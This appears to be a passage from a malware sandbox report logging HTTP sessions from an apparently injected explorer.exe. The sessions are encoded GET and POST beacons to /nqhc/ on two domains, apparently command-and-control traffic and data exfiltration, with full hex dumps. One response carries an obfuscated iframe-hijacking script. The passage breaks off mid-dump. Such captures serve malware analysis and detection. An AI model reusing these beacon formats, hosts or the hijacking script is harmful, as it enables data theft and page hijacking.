                                                                                                                                                                                    Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    30192.168.11.2049855103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:46.471515894 CET951OUTGET /nqhc/?r4txB=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.005404.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:21:46.659885883 CET953INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:46 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 1741
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    ETag: "634bbb43-6cd"
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 7d 63 61 74 63 68 28 65 29 7b 7d 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 74 72 79 7b 76 61 72 20 74 61 67 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 74 61 67 4e 61 6d 65 3b 76 61 72 20 6d 79 69 64 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 69 64 3b 69 66 28 6d 79 69 64 21 3d 22 69 63 6f
                                                                                                                                                                                    Data Ascii: <html><head><meta charset="UTF-8"/><title>404 Not Found</title><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><link rel="icon" type="image/x-icon" href="http://45.122.138.45/favicon.ico"><script>document.writeln('');var ss='<div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><iframe scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="100%" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#52;&#53;&#46;&#49;&#50;&#50;&#46;&#49;&#51;&#56;&#46;&#52;&#53;&#47;"></iframe></div><style type="text/css">html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden}</style>';eval("document.write('"+ss+"');");try{setInterval(function(){try{document.getElementById("divAll").style.display="none"}catch(e){}for(var i=0;i<document.body.children.length;i++){try{var tagname=document.body.children[i].tagName;var myid=document.body.children[i].id;if(myid!="ico
                                                                                                                                                                                    Nov 21, 2022 19:21:46.659972906 CET953INData Raw: 6e 44 69 76 31 22 26 26 6d 79 69 64 21 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 29 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65
                                                                                                                                                                                    Data Ascii: nDiv1"&&myid!="showcloneshengxiaon"){document.body.children[i].style.display="none"}}catch(e){}}},100)}catch(e){}</script><script>(function(){var bp=document.createElement('script');var curProtocol=window.location.protocol.split(':')[0];if(cur


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    31192.168.11.204985666.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:00.103615999 CET955OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gouldent.site
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 69 47 6b 58 47 74 4d 66 67 68 50 53 46 6d 38 41 36 78 53 4d 69 73 75 55 64 45 71 66 6c 7a 51 7a 4c 76 38 51 6b 57 70 4f 7a 6e 4c 73 73 6f 28 32 67 50 61 6f 32 2d 28 7a 33 5a 6e 6d 39 4d 6f 6f 49 54 55 51 6d 66 6d 4d 32 39 77 75 7a 48 73 6d 51 31 41 73 53 54 52 34 77 4a 68 4f 6c 55 4f 41 52 56 74 32 32 55 52 66 59 6d 69 72 47 63 33 5a 30 6e 4e 44 51 63 56 4b 48 4c 45 38 46 68 55 58 79 4d 62 6f 43 47 6a 75 37 37 39 63 75 30 4e 7a 7e 77 6c 30 68 49 45 69 62 79 4b 55 4c 49 4e 44 73 67 75 6a 6a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=4aNeThNKxkEEiGkXGtMfghPSFm8A6xSMisuUdEqflzQzLv8QkWpOznLsso(2gPao2-(z3Znm9MooITUQmfmM29wuzHsmQ1AsSTR4wJhOlUOARVt22URfYmirGc3Z0nNDQcVKHLE8FhUXyMboCGju779cu0Nz~wl0hIEibyKULINDsgujjg).
                                                                                                                                                                                    Nov 21, 2022 19:22:00.395703077 CET956INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:00 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    32192.168.11.204985766.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:02.286689997 CET957OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gouldent.site
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 30 7a 49 4b 59 51 32 44 46 4f 77 6e 4c 73 7e 49 28 33 76 76 62 6d 32 35 32 4f 33 64 6e 6d 39 49 34 6f 49 67 73 51 33 5f 6d 50 39 64 77 70 30 48 73 6c 62 56 41 6d 53 54 64 56 77 49 6c 4f 6c 46 69 41 51 58 46 32 79 41 46 63 64 47 69 70 54 4d 33 59 7e 48 4e 6b 51 63 6f 31 48 4b 74 48 45 54 49 58 79 73 37 6f 51 57 6a 68 68 37 38 55 78 45 4d 74 78 69 45 62 6d 70 45 4b 4d 51 61 7a 4b 72 51 51 76 6b 47 70 28 4c 4f 6a 71 6d 59 78 4f 79 58 5f 33 67 42 44 4d 64 6a 41 57 33 69 50 48 54 39 67 4f 52 4f 36 68 6a 38 63 75 4d 53 6b 34 34 4d 6d 63 72 79 41 5a 45 37 57 65 4a 6b 4b 28 78 79 68 62 71 48 79 4b 6c 74 30 58 63 34 53 62 44 42 38 70 62 77 49 74 79 52 6f 78 4d 52 77 7a 32 65 71 56 5a 4b 37 58 31 32 61 51 67 58 6a 57 5a 67 68 6f 37 30 6c 6b 61 66 65 32 34 4a 58 67 37 68 7a 70 56 35 4f 4e 51 4e 41 33 72 38 71 4a 34 46 46 7e 54 6a 74 4a 55 59 6c 36 47 31 45 73 63 7e 5f 46 48 61 39 73 4c 65 72 76 2d 42 4c 36 44 33 6c 4f 77 79 5f 48 62 7a 6a 42 56 39 46 6a 4c 52 63 4b 61 65 71 6a 70 73 47 76 76 69 66 51 68 7e 38 56 30 75 75 63 33 48 69 38 5a 32 4c 43 78 4a 7a 30 36 43 75 35 31 43 67 77 66 34 76 73 36 4c 75 45 41 7e 4e 71 35 62 43 70 61 38 6d 58 7a 4e 31 75 48 76 4d 38 71 46 6a 61 4c 35 75 41 74 6e 77 71 30 67 35 49 58 79 50 5a 45 61 33 6c 46 32 42 70 64 77 50 7a 58 41 7a 67 38 58 57 54 79 4e 41 59 6d 67 30 54 4d 75 68 41 55 55 73 46 7a 6e 43 67 75 6b 44 78 48 49 79 37 6d 39 2d 7e 6a 6a 66 48 58 6a 58 74 73 30 67 78 73 38 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB0zIKYQ2DFOwnLs~I(3vvbm252O3dnm9I4oIgsQ3_mP9dwp0HslbVAmSTdVwIlOlFiAQXF2yAFcdGipTM3Y~HNkQco1HKtHETIXys7oQWjhh78UxEMtxiEbmpEKMQazKrQQvkGp(LOjqmYxOyX_3gBDMdjAW3iPHT9gORO6hj8cuMSk44MmcryAZE7WeJkK(xyhbqHyKlt0Xc4SbDB8pbwItyRoxMRwz2eqVZK7X12aQgXjWZgho70lkafe24JXg7hzpV5ONQNA3r8qJ4FF~TjtJUYl6G1Esc~_FHa9sLerv-BL6D3lOwy_HbzjBV9FjLRcKaeqjpsGvvifQh~8V0uuc3Hi8Z2LCxJz06Cu51Cgwf4vs6LuEA~Nq5bCpa8mXzN1uHvM8qFjaL5uAtnwq0g5IXyPZEa3lF2BpdwPzXAzg8XWTyNAYmg0TMuhAUUsFznCgukDxHIy7m9-~jjfHXjXts0gxs8.
                                                                                                                                                                                    Nov 21, 2022 19:22:02.560440063 CET958INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:02 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    33192.168.11.204985866.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:04.492155075 CET962OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gouldent.site
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 38 7a 4c 38 55 51 6b 30 78 4f 78 6e 4c 73 6c 49 28 79 76 76 62 72 32 5f 66 4a 33 64 72 51 39 4f 6b 6f 49 7a 45 51 33 4b 79 50 34 64 77 6f 37 6e 73 6e 51 31 41 79 53 54 52 61 77 49 67 31 6c 55 57 41 52 58 31 32 32 79 74 66 54 32 69 72 54 4d 33 63 36 48 4e 7a 51 63 74 6f 48 4b 68 48 45 52 38 58 7a 66 44 6f 44 31 62 68 31 62 38 56 6f 30 4e 74 34 43 45 36 6d 70 67 65 4d 51 61 46 4b 70 38 51 76 6a 79 70 7e 4d 36 69 70 47 59 78 51 43 58 34 7a 68 39 48 4d 64 76 75 57 33 57 50 48 52 74 67 4e 78 4f 36 6b 43 38 66 34 38 53 69 79 59 4e 67 57 4c 75 49 5a 41 54 43 65 49 41 4b 34 42 6d 68 61 5a 76 79 4d 48 4a 30 65 63 34 51 47 7a 42 76 6a 37 77 55 74 79 41 42 78 50 5a 61 7a 30 79 71 45 4c 53 37 54 55 32 56 48 77 57 71 61 35 68 37 73 37 78 6b 6b 61 75 66 32 34 4a 35 67 2d 52 7a 75 6b 4a 4f 4f 52 4e 48 30 37 39 44 42 59 45 48 30 7a 76 33 4a 55 73 39 36 46 31 55 73 64 32 5f 47 6e 61 39 75 73 4b 71 6c 4f 42 4d 6c 7a 32 71 54 67 79 57 48 63 37 4a 42 51 46 5f 69 34 46 63 4a 4f 36 71 70 5a 73 46 72 50 69 62 57 52 7e 2d 65 55 75 75 63 77 4f 62 38 5a 79 4c 43 6b 74 7a 30 4e 6d 75 70 32 61 67 32 66 34 74 73 36 4c 7a 45 41 69 45 71 35 43 56 70 61 73 41 58 77 39 31 75 57 28 4d 28 76 78 67 66 37 35 6e 53 64 6d 6f 31 6b 38 75 49 58 75 48 5a 41 47 34 6b 33 69 42 6f 64 41 50 69 48 41 79 79 73 58 56 62 53 4e 61 4a 32 63 53 54 4d 7a 55 41 55 49 47 46 30 62 43 73 70 51 55 32 6d 49 6b 76 77 68 72 34 47 76 76 48 52 6a 71 33 75 6f 52 6d 62 53 4d 41 54 44 71 78 61 78 56 4b 61 76 62 6e 32 34 2d 59 52 39 52 49 76 68 5f 28 6a 41 43 7a 39 72 6c 6d 6a 52 53 62 61 70 54 51 51 42 4e 77 76 44 79 7a 33 6d 35 7e 46 45 4d 6f 31 65 61 35 59 76 50 73 4a 4b 4e 4c 61 30 50 64 52 68 7a 52 65 69 72 63 69 37 4e 45 72 74 30 7a 41 72 2d 71 6a 6d 75 64 45 33 4c 43 66 42 41 43 52 53 4f 53 73 77 4d 55 32 59 61 52 71 5a 65 33 65 42 34 6e 34 6c 6e 31 66 33 66 43 5f 72 74 44 36 4c 4b 28 74 75 6f 42 5f 30 61 58 75 44 76 77 74 55 73 4d 66 48 66 6f 44 78 4d 33 4f 32 6b 68 78 44 35 6f 58 43 76 30 59 45 32 4f 71 31 41 76 65 77 4b 44 71 39 67 41 69 76 78 32 31 71 76 35 75 6b 59 42 65 65 5f 76 52 48 56 6c 62 37 56 68 6e 65 76 4f 31 71 68 46 4e 5a 78 41 4e 78 43 48 4a 48 69 66 59 32 69 31 75 6d 6f 79 73 30 71 4f 70 39 53 32 47 38 72 78 32 4d 79 6b 4c 65 70 68 6b 78 4d 45 64 7e 30 78 31 77 6e 74 33 41 36 31 34 53 33 64 72 67 52 78 64 4d 54 69 69 36 63 61 5f 35 55 52 76 28 41 50 57 4a 49 30 54 55 59 66 56 31 69 49 63 30 57 7e 37 55 50 78 74 58 2d 71 58 35 38 54 59 76 4c 45 51 6a 45 34 62 76 66 50 51 52 51 4c 76 7e 49 45 55 67 55 53 7a 35 4b 56 62 41 76 72 73 32 75 62 72 4f 39 68 57 6c 64 6a 4d 4e 6c 41 7a 69 53 41 5a 7a 30 6e 63 71 33 4b 69 56 4e 48 6c 54 38 76 36 61 65 4c 4f 4d 56 6b 34 4f 71 53 6e 4b 65 37 5a 35 5a 6a 71 28 6b 51 71 42 46 64 39 6c 44 41 49 68 44 33 53 43 59 76 5f 52 45 74 57 4f 4a 7a 37 28 68 39 79 4a 6b 55 67 43 7a 30 47 36 66 37 53 41 68 7a 6e 62 45 39 77 72 35 65 2d 41 4e 6a 32 39 4d 50 4f 45 4e 69 6b 32 4c 42 66 32 7a 53 70 55 65 33 39 79 78 68 6d 65 45 30 76 72 47 6f 6b 74 75 57 30 61 57 49 66 55 31 4d 67 5a 39 4a 34 74 50 31 50 43 37 7e 42 55 6a 4b 36 63 52 75 34 47 68 48 47 46 34 65 52 30 33 5a 4e 59 61 77 6f 67 35 50 41 71 68 4e 67 6a 4e 4a 31 56 79 58 73 31 6a 4f 59 68 4a 33 6c 35 54 34 4b 78 53 76 48 46 48 7a 42 67 61 6a 49 66 48 47 42 43 66 31 6f 75 49 48 7a 50 49 7a 45 77 4e 63 6a 43 66 56 4a 46 46 77 44 49 54 5a 2d 4a 6b 57 52 4b 77 7e 56 77 6b 47 55 57 31 78 4f 65 55 53 2d 37 44 6c 33 47 72 39 33 68 44 49 5a 42 2d 37 68 6a 62 50 44 41 68 6f 63 72 6b 57 55 47 67 5a 38 33 68 33 71 6d 70 6d 45 66 59 44 37 6f 6a 71 41 41 63 77 45 61 59 68 4e 58 6f 62 64 44 64 6d 74 77 69 76 33 73 4d 77 79 48 31 62 63 63 6f 34 45 63 62 39 72 4c 48 69 53 48 48 78 6d 6a 32 6d 72 67 59 32 4e 30 75 54 51 73 42 53 64 72 4c 